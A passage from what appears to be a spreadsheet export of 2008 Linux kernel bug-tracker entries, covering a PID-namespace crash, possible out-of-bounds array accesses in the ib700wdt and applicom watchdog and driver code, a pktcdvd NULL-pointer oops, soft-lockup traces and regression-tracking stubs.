]--- Fixing recursive fault but reboot is needed! ------------------------------------- Problem happens with PID namespaces enabled. After killing the child reaper of a new namespace with SIGKILL, the kernel crashes. I did some debugging and as far as I could see, the NULL pointer dereference happens on this line: info.si_pid = task_pid_nr_ns(tsk, tsk-&gt;parent-&gt;nsproxy-&gt;pid_ns); I did a BUG_ON(!tsk-&gt;parent-&gt;nsproxy) one line above and got an appropriate message before the kernel crashed. Software Environment: (test program attached) Steps to reproduce: Compile the attached test program with "gcc -o ns_exec ns_exec.c -lpthread". After being started, it will create a new PID namespace, mount a proc filesystem herein, create a new thread and fork() into an SSHd. Login via SSH (the port of the started SSHd is hardcoded in the test program, so you'll have to modify it appropriately if you wish to do so ;-) ). Do a "kill -9 1". On my machines, the kernel crashed in over 90% of all tests.</t>
  </si>
  <si>
    <t>ath9k do not support wpa2</t>
  </si>
  <si>
    <t>2.6.27.rc4</t>
  </si>
  <si>
    <t>2008-08-21 15:03 UTC</t>
  </si>
  <si>
    <t>2008-09-13 15:19 UTC</t>
  </si>
  <si>
    <t>i have macbook pro with AR5418, and DWL-700AP access point. I try two driverd madwifi (trunk 3844) and ath9k driver from 2.6.27.rc4.</t>
  </si>
  <si>
    <t>(patch queued)possible buffer underflow in ib700wdt.c</t>
  </si>
  <si>
    <t>2008-08-21 17:38 UTC</t>
  </si>
  <si>
    <t>Zvonimir Rakamaric</t>
  </si>
  <si>
    <t>2008-12-19 02:26 UTC</t>
  </si>
  <si>
    <t>Problem Description: Steps to a possible buffer_underflow bug in ib700wdt.c, function ibwdt_ioctl: 1. new margin is loaded using get_user(new_margin, p) in case WDIOC_SETTIMEOUT in the function ibwdt_ioctl. Important: assume that new_margin == 30 2. ibwdt_set_heartbeat(new_margin) is called 3. the check "if ((t &lt; 0) || (t &gt; 30))" in ibwdt_set_heartbeat is not going to fail because t == 30 (t is new_margin) 4. in the loop, the check wd_times[i] &gt; t is never going to be true because none of the wd_times are greater than the value of t (i.e. 30) 5. we are exiting the loop with i == -1 and therefore setting wd_margin to -1 in the line wd_margin = i; 6. we are returning from ibwdt_set_heartbeat and wd_margin is -1 7. we fall through to case WDIOC_GETTIMEOUT 8. we access the wd_times array with wd_margin == -1 on line "return put_user(wd_times[wd_margin], p);" I found this bug using my own static checker for low-level systems software whose codename is Smack, which I am developing as a part of my PhD. For the sake of my research (and also I am currently in the process of writing a paper about Smack), I would greatly appreciate if you could confirm/dispute the bug as soon as possible. Thanks a lot! -- Zvonimir Furthermore, here are the pieces of code which are causing this buffer-underflow bug in ib700wdt.c: static int wd_times[] = { 30, /* 0x0 */ 28, /* 0x1 */ 26, /* 0x2 */ 24, /* 0x3 */ 22, /* 0x4 */ 20, /* 0x5 */ 18, /* 0x6 */ 16, /* 0x7 */ 14, /* 0x8 */ 12, /* 0x9 */ 10, /* 0xA */ 8, /* 0xB */ 6, /* 0xC */ 4, /* 0xD */ 2, /* 0xE */ 0, /* 0xF */ }; function ibwdt_ioctl: ..... case WDIOC_SETTIMEOUT: if (get_user(new_margin, p)) return -EFAULT; if (ibwdt_set_heartbeat(new_margin)) return -EINVAL; ibwdt_ping(); /* Fall */ case WDIOC_GETTIMEOUT: return put_user(wd_times[wd_margin], p); ..... function ibwdt_set_heartbeat: static int ibwdt_set_heartbeat(int t) { int i; if ((t &lt; 0) || (t &gt; 30)) return -EINVAL; for (i = 0x0F; i &gt; -1; i--) if (wd_times[i] &gt; t) break; wd_margin = i; return 0; }</t>
  </si>
  <si>
    <t>2.6.27-rc4</t>
  </si>
  <si>
    <t>Jean-Francois Moine</t>
  </si>
  <si>
    <t>pktcdvd: BUG, NULL pointer dereference in pkt_ioctl, bisected</t>
  </si>
  <si>
    <t>2008-08-22 08:16 UTC</t>
  </si>
  <si>
    <t>2008-08-27 15:46 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: 2.6.27-rc1 Steps to reproduce: # pktsetup dvd /dev/dvdrw1 pktcdvd: writer pktcdvd0 mapped to hdc (insert an UDF-formatted DVD-RW) # mount -tauto /dev/pktcdvd/dvd /media/pkt pktcdvd: Fixed packets, 16 blocks, Mode-1 disc pktcdvd: write speed 2770kB/s pktcdvd: 4595774kB available on disc BUG: unable to handle kernel NULL pointer dereference at 0000000c IP: [&lt;e1cd15be&gt;] :pktcdvd:pkt_ioctl+0xa/0x97 *pde = 00000000 Oops: 0000 [#1] PREEMPT Modules linked in: udf pktcdvd radeon drm lp nls_iso8859_1 nls_cp850 vfat fat reiserfs ipv6 eeprom w83781d hwmon_vid usblp snd_ens1371 gameport snd_ac97_codec af_packet ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_oss snd_seq_midi snd_rawmidi sr_mod snd_seq_midi_event cdrom sg snd_seq snd_timer firewire_ohci snd_seq_device firewire_core snd crc_itu_t via686a ata_generic parport_pc soundcore uhci_hcd via_agp snd_page_alloc i2c_viapro parport agpgart ohci1394 usbcore ieee1394 evdev rtc pcspkr floppy dm_snapshot reiser4 lzo_decompress lzo_compress sd_mod pata_via libata scsi_mod dock dm_mirror dm_log dm_mod Pid: 4310, comm: mount Not tainted (2.6.27-rc4-00022-g7a10e7d #65) EIP: 0060:[&lt;e1cd15be&gt;] EFLAGS: 00010286 CPU: 0 EIP is at pkt_ioctl+0xa/0x97 [pktcdvd] EAX: 00000000 EBX: e1cd15b4 ECX: de910dcc EDX: 00005310 ESI: 00005310 EDI: 00000000 EBP: de910dcc ESP: de910c90 DS: 007b ES: 007b FS: 0000 GS: 0033 SS: 0068 Process mount (pid: 4310, ti=de910000 task=dfbeadc0 task.ti=de910000) Stack: e1cd15b4 dfaae000 00000000 de910dcc c01bd38a dba2cdb4 00005310 fffffdfd 00000000 dba2cd00 c01bdaeb 00005310 de910dcc dba2cd0c c028e865 dba2cd00 00000000 00005310 00000000 dba2cdb4 dfaae000 dba2cd0c e1cd7000 00000000 Call Trace: [&lt;e1cd15b4&gt;] pkt_ioctl+0x0/0x97 [pktcdvd] [&lt;c01bd38a&gt;] blkdev_driver_ioctl+0x26/0x5b [&lt;c01bdaeb&gt;] blkdev_ioctl+0x72c/0x74d [&lt;c028e865&gt;] __mutex_unlock_slowpath+0xdf/0xf1 [&lt;c017b786&gt;] __blkdev_get+0x63/0x6e [&lt;c01c70ed&gt;] string+0x27/0x6d [&lt;c01c73ae&gt;] vsnprintf+0x27b/0x43e [&lt;c01588b6&gt;] cpu_cache_get+0x8/0xd [&lt;c01593e5&gt;] ____cache_alloc+0x14/0x469 [&lt;c017bb10&gt;] ioctl_by_bdev+0x23/0x32 [&lt;e1e1b6f8&gt;] udf_get_last_session+0x1a/0x32 [udf] [&lt;e1e1f97e&gt;] udf_fill_super+0x162/0x7a3 [udf] [&lt;c01588b6&gt;] cpu_cache_get+0x8/0xd [&lt;c018b918&gt;] disk_name+0x1f/0x5b [&lt;c01cffff&gt;] pci_read_config+0x9d/0x1a6 [&lt;c015e0ce&gt;] get_sb_bdev+0xc9/0x10b [&lt;e1e1dffb&gt;] udf_get_sb+0x12/0x16 [udf] [&lt;e1e1f81c&gt;] udf_fill_super+0x0/0x7a3 [udf] [&lt;c015db6c&gt;] vfs_kern_mount+0x39/0x72 [&lt;c015de71&gt;] do_kern_mount+0x2f/0xad [&lt;c016e1ed&gt;] do_new_mount+0x55/0x89 [&lt;c016f143&gt;] do_mount+0x17c/0x19b [&lt;c0145628&gt;] alloc_pages_node+0x1a/0x1d [&lt;c014565f&gt;] __get_free_pages+0xb/0x26 [&lt;c016da86&gt;] copy_mount_options+0x26/0x10d [&lt;c016f5f0&gt;] sys_mount+0x6d/0xaa [&lt;c01038cd&gt;] sysenter_do_call+0x12/0x35 ======================= Code: a6 78 cd ff c6 44 24 04 1e 85 f6 58 89 f8 89 e2 0f 95 44 24 04 e8 3a fd ff ff 83 c4 2c 5b 5e 5f c3 55 89 cd 57 89 c7 56 89 d6 53 &lt;8b&gt; 40 0c 8b 58 24 e8 6b e3 5b de 81 fe 09 53 00 00 8b 83 b4 01 EIP: [&lt;e1cd15be&gt;] pkt_ioctl+0xa/0x97 [pktcdvd] SS:ESP 0068:de910c90 ---[ end trace 0986c4dfec814e67 ]--- git-bisect said: 5b6155ee70e9c4d2ad7e6f514c8eee06e2711c3a is first bad commit commit 5b6155ee70e9c4d2ad7e6f514c8eee06e2711c3a Author: Alan Cox &lt;alan@lxorguk.ukuu.org.uk&gt; Date: Fri Jul 4 09:29:16 2008 +0200 pktcdvd: push BKL down into driver Push the lock_kernel down into the driver and switch to unlocked_ioctl [akpm@linux-foundation.org: build fix] Signed-off-by: Alan Cox &lt;alan@redhat.com&gt; Acked-by: Peter Osterlund &lt;petero2@telia.com&gt; Signed-off-by: Andrew Morton &lt;akpm@linux-foundation.org&gt; Signed-off-by: Jens Axboe &lt;jens.axboe@oracle.com&gt; :040000 040000 0c7aeb48357bd31ac8f115f89106f5182e25c3ee b8363c3541c4d00a83ab6b28657dabcef890a7dc M drivers Indeed, udf_get_last_session calls ioctl_by_bdev, which calls blkdev_ioctl with a NULL file. As a result, pkt_ioctl is called with a NULL file.</t>
  </si>
  <si>
    <t>skbuff bug?</t>
  </si>
  <si>
    <t>2008-08-22 14:30 UTC</t>
  </si>
  <si>
    <t>2008-08-27 14:30 UTC</t>
  </si>
  <si>
    <t>Subject : skbuff bug? Submitter : "Yinghai Lu" &lt;yhlu.kernel@gmail.com&gt; Date : 2008-08-21 3:56 References : http://marc.info/?l=linux-kernel&amp;m=121929102707658&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>patch "x86: MOVE PCI IO ECS code to x86/pci" breaks CPU hotplug</t>
  </si>
  <si>
    <t>commit 3a27dd1ce5de08e21e0266ddf00e6f1f843bfe8b</t>
  </si>
  <si>
    <t>2008-08-22 14:59 UTC</t>
  </si>
  <si>
    <t>2008-08-25 14:13 UTC</t>
  </si>
  <si>
    <t>Robert Richter</t>
  </si>
  <si>
    <t>Subject : patch "x86: MOVE PCI IO ECS code to x86/pci" breaks CPU hotplug Submitter : "Jan Beulich" &lt;jbeulich@novell.com&gt; Date : 2008-08-21 12:59 References : http://marc.info/?l=linux-kernel&amp;m=121932366326572&amp;w=4 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Handled-By : Robert Richter &lt;robert.richter@amd.com&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>(patch queued) another possible buffer-overflow bug in applicom.c</t>
  </si>
  <si>
    <t>2008-08-22 15:07 UTC</t>
  </si>
  <si>
    <t>2008-12-09 22:04 UTC</t>
  </si>
  <si>
    <t>Hi, first of all, I appreciate your quick response regarding the bug related to the same file (applicom.c) I submitted recently (Bug #11397). If you ever get to taking a closer look and maybe fixing that one, here is another one from the same file. Problem Description: Here is the part of code from applicom.c (function ac_ioctl) showing what I think is a possible buffer-overflow bug: ..... IndexCard = adgl-&gt;num_card-1; if(cmd != 0 &amp;&amp; cmd != 6 &amp;&amp; ((IndexCard &gt;= MAX_BOARD) || !apbs[IndexCard].RamIO)) { static int warncount = 10; if (warncount) { printk( KERN_WARNING "APPLICOM driver IOCTL, bad board number %d\n",(int)IndexCard+1); warncount--; } kfree(adgl); return -EINVAL; } switch (cmd) { case 0: pmem = apbs[IndexCard].RamIO; .... Explanation: If cmd == 0 (or cmd == 6) then IndexCard is not going to be checked for size in this if statement: if(cmd != 0 &amp;&amp; cmd != 6 &amp;&amp; ((IndexCard &gt;= MAX_BOARD) || !apbs[IndexCard].RamIO)) { which means that when we hit this case: case 0: pmem = apbs[IndexCard].RamIO; it is possible that IndexCard &gt;= MAX_BOARD and we have a buffer overflow. There is a possibility, however, that there is an implicit, complex invariant that whenever cmd == 0 or cmd == 6, IndexCard is never going to be out of bounds and therefore doesn't have to be checked. Then this bug wouldn't happen, but I think this is still a pretty bas coding practice. Any explanation would be greatly appreciated. Thanks! -- Zvonimir</t>
  </si>
  <si>
    <t>build issue #564 for v2.6.27-rc4 : undefined reference to `NS8390p_init'</t>
  </si>
  <si>
    <t>2008-08-22 15:10 UTC</t>
  </si>
  <si>
    <t>2008-08-30 14:37 UTC</t>
  </si>
  <si>
    <t>Subject : build issue #564 for v2.6.27-rc4 : undefined reference to `NS8390p_init' Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2008-08-22 8:33 References : http://marc.info/?l=linux-kernel&amp;m=121939410214677&amp;w=4 Handled-By : Alan Cox &lt;alan@lxorguk.ukuu.org.uk&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121943097320451&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>SLUB list_lock vs obj_hash.lock...</t>
  </si>
  <si>
    <t>2008-08-22 15:21 UTC</t>
  </si>
  <si>
    <t>2008-09-06 15:25 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.27-rc4] SLUB list_lock vs obj_hash.lock... Submitter : "Daniel J Blueman" &lt;daniel.blueman@gmail.com&gt; Date : 2008-08-22 21:48 References : http://marc.info/?l=linux-kernel&amp;m=121944176609042&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>get_rtc_time() triggers NMI watchdog in hpet_rtc_interrupt()</t>
  </si>
  <si>
    <t>2008-08-23 12:00 UTC</t>
  </si>
  <si>
    <t>2008-08-30 14:03 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] get_rtc_time() triggers NMI watchdog in hpet_rtc_interrupt() Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2008-08-23 9:48 References : http://marc.info/?l=linux-kernel&amp;m=121948503224161&amp;w=4 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121950734922457&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Random crashes with 2.6.27-rc3 on PPC</t>
  </si>
  <si>
    <t>2008-08-23 12:05 UTC</t>
  </si>
  <si>
    <t>2008-09-03 22:36 UTC</t>
  </si>
  <si>
    <t>Subject : Random crashes with 2.6.27-rc3 on PPC Submitter : Michael Buesch &lt;mb@bu3sch.de&gt; Date : 2008-08-23 14:10 References : http://marc.info/?l=linux-kernel&amp;m=121950076812616&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>HP Compaq 6715s (and similar) horrible slow HD performance, max cstate must be 1</t>
  </si>
  <si>
    <t>2.6.24.x - 2.6.27rc4</t>
  </si>
  <si>
    <t>2008-08-24 07:56 UTC</t>
  </si>
  <si>
    <t>Matthias Tingelhoff</t>
  </si>
  <si>
    <t>2009-02-09 17:17 UTC</t>
  </si>
  <si>
    <t>The problem is described here: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/134856 Figured out that an entry in the set_max_cstate table in acpi/processor_idle.c fixes that problem.</t>
  </si>
  <si>
    <t>Kernel Crash during Boot with External Monitor, probably intelfb</t>
  </si>
  <si>
    <t>2008-08-24 12:33 UTC</t>
  </si>
  <si>
    <t>2008-11-16 01:32 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown. Earliest failing kernel version: 2.6.27-rc4 (83097aca8567a0bd593534853b71fe0fa9a75d69) Hardware Environment: Acer Extensa 5220. Problem Description: When I boot and the external monitor is plugged in at the time of power on (and chosen as the main monitor by the BIOS), Linux crashes reproducibly during boot, probably during init of the intelfb. It's a real crash - nothing happens even if I wait 5 minutes, no HD activity, etc. Please let me know what I can test to help. The problem never appears without the external monitor attached. It neither appears when the external monitor is attached during resume from S3-STR. Steps to reproduce: Plug-In external Monitor (D-sub), Power on.</t>
  </si>
  <si>
    <t>Many soft lockups</t>
  </si>
  <si>
    <t>2.6.27-rc4-git3</t>
  </si>
  <si>
    <t>2008-08-24 13:06 UTC</t>
  </si>
  <si>
    <t>2008-09-09 02:18 UTC</t>
  </si>
  <si>
    <t>11191 11279</t>
  </si>
  <si>
    <t>Sometimes my Konsole will have a slow respond for the keyboard. It may also stop at half of dmesg output(or other process) at times, when I move the mouse, it would be back to continue. I got some debug messages: [ 437.711014] BUG: soft lockup - CPU#1 stuck for 74s! [swapper:0] [ 437.711014] Modules linked in: fuse ricoh_mmc [ 437.711014] [ 437.711014] Pid: 0, comm: swapper Not tainted (2.6.27-rc4-g9-debug-00130-g6450f65 #14) [ 437.711014] EIP: 0060:[&lt;c0142829&gt;] EFLAGS: 00000292 CPU: 1 [ 437.711014] EIP is at tick_nohz_restart_sched_tick+0x39/0x140 [ 437.711014] EAX: e990dc7b EBX: 01020800 ECX: 00000001 EDX: 00000000 [ 437.711014] ESI: 00000001 EDI: c1714fa0 EBP: 00000001 ESP: f784bf94 [ 437.711014] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [ 437.711014] CR0: 8005003b CR2: b800c000 CR3: 26b7c000 CR4: 000006d0 [ 437.711014] DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 [ 437.711014] DR6: ffff0ff0 DR7: 00000400 [ 437.711014] [&lt;c0101d27&gt;] ? cpu_idle+0x97/0x120 [ 437.711014] ======================= [ 544.224041] BUG: soft lockup - CPU#1 stuck for 66s! [syslogd:1219] [ 544.224041] Modules linked in: fuse ricoh_mmc [ 544.224041] [ 544.224041] Pid: 1219, comm: syslogd Not tainted (2.6.27-rc4-g9-debug-00130-g6450f65 #14) [ 544.224041] EIP: 0060:[&lt;c04b55bb&gt;] EFLAGS: 00000202 CPU: 1 [ 544.224041] EIP is at _spin_unlock_irq+0xb/0x30 [ 544.224041] EAX: 00000001 EBX: c1718240 ECX: 00000000 EDX: 00004645 [ 544.224041] ESI: f6266e00 EDI: f7831c80 EBP: 00000000 ESP: f6107ac8 [ 544.224041] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 544.224041] CR0: 8005003b CR2: b09b5000 CR3: 36d56000 CR4: 000006d0 [ 544.224041] DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 [ 544.224041] DR6: ffff0ff0 DR7: 00000400 [ 544.224041] [&lt;c012004a&gt;] finish_task_switch+0x2a/0xb0 [ 544.224041] [&lt;c04b384b&gt;] schedule+0x26b/0x7b0 [ 544.224041] [&lt;c01f6b09&gt;] journal_dirty_metadata+0x89/0x150 [ 544.224041] [&lt;c01f2132&gt;] __ext3_journal_dirty_metadata+0x22/0x60 [ 544.224041] [&lt;c01f6b09&gt;] journal_dirty_metadata+0x89/0x150 [ 544.224041] [&lt;c04b3fa5&gt;] schedule_timeout+0x75/0xc0 [ 544.224041] [&lt;c01956a7&gt;] do_select+0x397/0x490 [ 544.224041] [&lt;c0195d10&gt;] __pollwait+0x0/0xe0 [ 544.224041] [&lt;c011e9d0&gt;] default_wake_function+0x0/0x10 [ 544.224041] [&lt;c01f2132&gt;] __ext3_journal_dirty_metadata+0x22/0x60 [ 544.224041] [&lt;c01f5a89&gt;] journal_get_write_access+0x29/0x40 [ 544.224041] [&lt;c01e572f&gt;] ext3_mark_iloc_dirty+0x1ff/0x340 [ 544.224041] [&lt;c01e5c39&gt;] ext3_mark_inode_dirty+0x29/0x40 [ 544.224041] [&lt;c01f548a&gt;] journal_stop+0x11a/0x1b0 [ 544.224041] [&lt;c01679dd&gt;] balance_dirty_pages_ratelimited_nr+0x5d/0x380 [ 544.224041] [&lt;c01f548a&gt;] journal_stop+0x11a/0x1b0 [ 544.224041] [&lt;c01e7ea0&gt;] ext3_ordered_write_end+0xf0/0x150 [ 544.224041] [&lt;c0128d83&gt;] current_fs_time+0x13/0x20 [ 544.224041] [&lt;c01615a3&gt;] generic_file_buffered_write+0x1c3/0x660 [ 544.224041] [&lt;c0128d83&gt;] current_fs_time+0x13/0x20 [ 544.224041] [&lt;c04b5594&gt;] _spin_unlock_irqrestore+0x14/0x30 [ 544.224041] [&lt;c013f9fa&gt;] clocksource_get_next+0x3a/0x40 [ 544.224041] [&lt;c013e329&gt;] update_wall_time+0x259/0x7e0 [ 544.224041] [&lt;c0116e2a&gt;] read_hpet+0xa/0x10 [ 544.224041] [&lt;c013df87&gt;] getnstimeofday+0x37/0xe0 [ 544.224041] [&lt;c012155d&gt;] task_tick_fair+0x3d/0xa0 [ 544.224041] [&lt;c013a8c4&gt;] hrtimer_forward+0x104/0x150 [ 544.224041] [&lt;c0116e2a&gt;] read_hpet+0xa/0x10 [ 544.224041] [&lt;c013df87&gt;] getnstimeofday+0x37/0xe0 [ 544.224041] [&lt;c013b8a9&gt;] hrtimer_run_pending+0x29/0x110 [ 544.224041] [&lt;c0141062&gt;] clockevents_program_event+0xa2/0x140 [ 544.224041] [&lt;c04b55c0&gt;] _spin_unlock_irq+0x10/0x30 [ 544.224041] [&lt;c012dabe&gt;] run_timer_softirq+0x16e/0x1a0 [ 544.224041] [&lt;c0195978&gt;] core_sys_select+0x1d8/0x300 [ 544.224041] [&lt;c01023eb&gt;] setup_sigcontext+0x10b/0x190 [ 544.224041] [&lt;c04b55c0&gt;] _spin_unlock_irq+0x10/0x30 [ 544.224041] [&lt;c0102814&gt;] do_notify_resume+0x3a4/0x770 [ 544.224041] [&lt;c0116e2a&gt;] read_hpet+0xa/0x10 [ 544.224041] [&lt;c013df87&gt;] getnstimeofday+0x37/0xe0 [ 544.224041] [&lt;c013aba2&gt;] enqueue_hrtimer+0x72/0xf0 [ 544.224041] [&lt;c04b5594&gt;] _spin_unlock_irqrestore+0x14/0x30 [ 544.224041] [&lt;c013b316&gt;] hrtimer_start+0xf6/0x190 [ 544.224041] [&lt;c0195e3b&gt;] sys_select+0x4b/0x1b0 [ 544.224041] [&lt;c0128706&gt;] alarm_setitimer+0x36/0x70 [ 544.224041] [&lt;c010339a&gt;] syscall_call+0x7/0xb [ 544.224041] ======================= [ 1933.378183] BUG: soft lockup - CPU#1 stuck for 68s! [swapper:0] [ 1933.378183] Modules linked in: fuse ricoh_mmc [ 1933.378183] [ 1933.378183] Pid: 0, comm: swapper Not tainted (2.6.27-rc4-g9-debug-00130-g6450f65 #14) [ 1933.378183] EIP: 0060:[&lt;c0142829&gt;] EFLAGS: 00000292 CPU: 1 [ 1933.378183] EIP is at tick_nohz_restart_sched_tick+0x39/0x140 [ 1933.378183] EAX: 26529b04 EBX: 01020800 ECX: 00000001 EDX: 00000000 [ 1933.378183] ESI: 00000001 EDI: c1714fa0 EBP: 00000001 ESP: f784bf94 [ 1933.378183] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [ 1933.378183] CR0: 8005003b CR2: a3554000 CR3: 00676000 CR4: 000006d0 [ 1933.378183] DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 [ 1933.378183] DR6: ffff0ff0 DR7: 00000400 [ 1933.378183] [&lt;c0101d27&gt;] ? cpu_idle+0x97/0x120 [ 1933.378183] ======================= [ 2714.154007] BUG: soft lockup - CPU#1 stuck for 70s! [swapper:0] [ 2714.154007] Modules linked in: fuse ricoh_mmc [ 2714.154007] [ 2714.154007] Pid: 0, comm: swapper Not tainted (2.6.27-rc4-g9-debug-00130-g6450f65 #14) [ 2714.154007] EIP: 0060:[&lt;c0142829&gt;] EFLAGS: 00000292 CPU: 1 [ 2714.154007] EIP is at tick_nohz_restart_sched_tick+0x39/0x140 [ 2714.154007] EAX: f027bf20 EBX: 01020800 ECX: 00000001 EDX: 00000000 [ 2714.154007] ESI: 00000001 EDI: c1714fa0 EBP: 00000001 ESP: f784bf94 [ 2714.154007] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [ 2714.154007] CR0: 8005003b CR2: b800c000 CR3: 1d842000 CR4: 000006d0 [ 2714.154007] DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 [ 2714.154008] DR6: ffff0ff0 DR7: 00000400 [ 2714.154008] [&lt;c0101d27&gt;] ? cpu_idle+0x97/0x120 [ 2714.154008] ======================= [ 3304.220009] BUG: soft lockup - CPU#1 stuck for 112s! [swapper:0] [ 3304.220009] Modules linked in: fuse ricoh_mmc [ 3304.220009] [ 3304.220009] Pid: 0, comm: swapper Not tainted (2.6.27-rc4-g9-debug-00130-g6450f65 #14) [ 3304.220009] EIP: 0060:[&lt;c0142829&gt;] EFLAGS: 00000292 CPU: 1 [ 3304.220009] EIP is at tick_nohz_restart_sched_tick+0x39/0x140 [ 3304.220009] EAX: 52d470f6 EBX: 01020800 ECX: 00000001 EDX: 00000000 [ 3304.220009] ESI: 00000001 EDI: c1714fa0 EBP: 00000001 ESP: f784bf94 [ 3304.220009] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [ 3304.220009] CR0: 8005003b CR2: b800c000 CR3: 1d9d5000 CR4: 000006d0 [ 3304.220009] DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 [ 3304.220009] DR6: ffff0ff0 DR7: 00000400 [ 3304.220009] [&lt;c0101d27&gt;] ? cpu_idle+0x97/0x120 [ 3304.220009] ======================= [ 3642.407022] APIC error on CPU0: 00(40) [ 3763.952016] APIC error on CPU0: 40(40) [ 4438.217465] BUG: soft lockup - CPU#1 stuck for 83s! [syslogd:1219] [ 4438.217465] Modules linked in: fuse ricoh_mmc [ 4438.217465] [ 4438.217465] Pid: 1219, comm: syslogd Not tainted (2.6.27-rc4-g9-debug-00130-g6450f65 #14) [ 4438.217465] EIP: 0060:[&lt;c04b55bb&gt;] EFLAGS: 00000286 CPU: 1 [ 4438.217465] EIP is at _spin_unlock_irq+0xb/0x30 [ 4438.217465] EAX: 00000001 EBX: c1718240 ECX: 00000000 EDX: 0000e4e3 [ 4438.217465] ESI: f6c77a00 EDI: f7831c80 EBP: 00000000 ESP: f6107ac8 [ 4438.217465] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 4438.217465] CR0: 8005003b CR2: a5e37004 CR3: 36d56000 CR4: 000006d0 [ 4438.217465] DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 [ 4438.217465] DR6: ffff0ff0 DR7: 00000400 [ 4438.217465] [&lt;c012004a&gt;] finish_task_switch+0x2a/0xb0 [ 4438.217465] [&lt;c04b384b&gt;] schedule+0x26b/0x7b0 [ 4438.217465] [&lt;c04b3fa5&gt;] schedule_timeout+0x75/0xc0 [ 4438.217465] [&lt;c01956a7&gt;] do_select+0x397/0x490 [ 4438.217465] [&lt;c0195d10&gt;] __pollwait+0x0/0xe0 [ 4438.217465] [&lt;c011e9d0&gt;] default_wake_function+0x0/0x10 [ 4438.217465] [&lt;c01f2132&gt;] __ext3_journal_dirty_metadata+0x22/0x60 [ 4438.217465] [&lt;c01f5a89&gt;] journal_get_write_access+0x29/0x40 [ 4438.217465] [&lt;c01e572f&gt;] ext3_mark_iloc_dirty+0x1ff/0x340 [ 4438.217465] [&lt;c01e5c39&gt;] ext3_mark_inode_dirty+0x29/0x40 [ 4438.217465] [&lt;c01f548a&gt;] journal_stop+0x11a/0x1b0 [ 4438.217465] [&lt;c01679dd&gt;] balance_dirty_pages_ratelimited_nr+0x5d/0x380 [ 4438.217465] [&lt;c01f548a&gt;] journal_stop+0x11a/0x1b0 [ 4438.217465] [&lt;c01e7ea0&gt;] ext3_ordered_write_end+0xf0/0x150 [ 4438.217465] [&lt;c01615a3&gt;] generic_file_buffered_write+0x1c3/0x660 [ 4438.217465] [&lt;c01a68cc&gt;] __mark_inode_dirty+0x5c/0x1a0 [ 4438.217465] [&lt;c0161f7a&gt;] __generic_file_aio_write_nolock+0x28a/0x4f0 [ 4438.217465] [&lt;c0190067&gt;] do_lookup+0x67/0x1d0 [ 4438.217465] [&lt;c0195978&gt;] core_sys_select+0x1d8/0x300 [ 4438.217465] [&lt;c01023eb&gt;] setup_sigcontext+0x10b/0x190 [ 4438.217465] [&lt;c04b55c0&gt;] _spin_unlock_irq+0x10/0x30 [ 4438.217465] [&lt;c0268627&gt;] rb_insert_color+0x77/0xe0 [ 4438.217465] [&lt;c013aba2&gt;] enqueue_hrtimer+0x72/0xf0 [ 4438.217465] [&lt;c04b5594&gt;] _spin_unlock_irqrestore+0x14/0x30 [ 4438.217465] [&lt;c013b316&gt;] hrtimer_start+0xf6/0x190 [ 4438.217465] [&lt;c0195e3b&gt;] sys_select+0x4b/0x1b0 [ 4438.217465] [&lt;c0128706&gt;] alarm_setitimer+0x36/0x70 [ 4438.217465] [&lt;c010339a&gt;] syscall_call+0x7/0xb [ 4438.217465] ======================= [ 4599.071020] APIC error on CPU0: 40(40)</t>
  </si>
  <si>
    <t>usb-storage device based on Rockchip 2706 is being disconnected and thus not mountable.</t>
  </si>
  <si>
    <t>2.6.25, 2.6.26, 2.6.27-rc2 and probably others</t>
  </si>
  <si>
    <t>2008-08-25 08:38 UTC</t>
  </si>
  <si>
    <t>Adrian Pilchowiec</t>
  </si>
  <si>
    <t>2008-09-29 08:47 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Hardware Environment: Asus F3Sc -&gt; http://www.smolts.org/show?uuid=pub_7bfb182b-dee4-4154-bf48-57bf02e363c6 Problem Description: When trying to plug PMP Eon Slide-R TC, device is being immediately disconnected, so there's no chance to mount and browse the device, even if it should be working with kernels &gt; 2.4.4 (as declared by producer). I've tried already to add udev rules for this PMP, reformatting the device and few different cables to exclude cabling problem, but all without luck. I don't have also usb hub. On Windows it's just working. Here's what i get from dmesg output: usb 5-1: new full speed USB device using uhci_hcd and address 3 usb 5-1: configuration #1 chosen from 1 choice scsi7 : SCSI emulation for USB Mass Storage devices usb-storage: device found at 3 usb-storage: waiting for 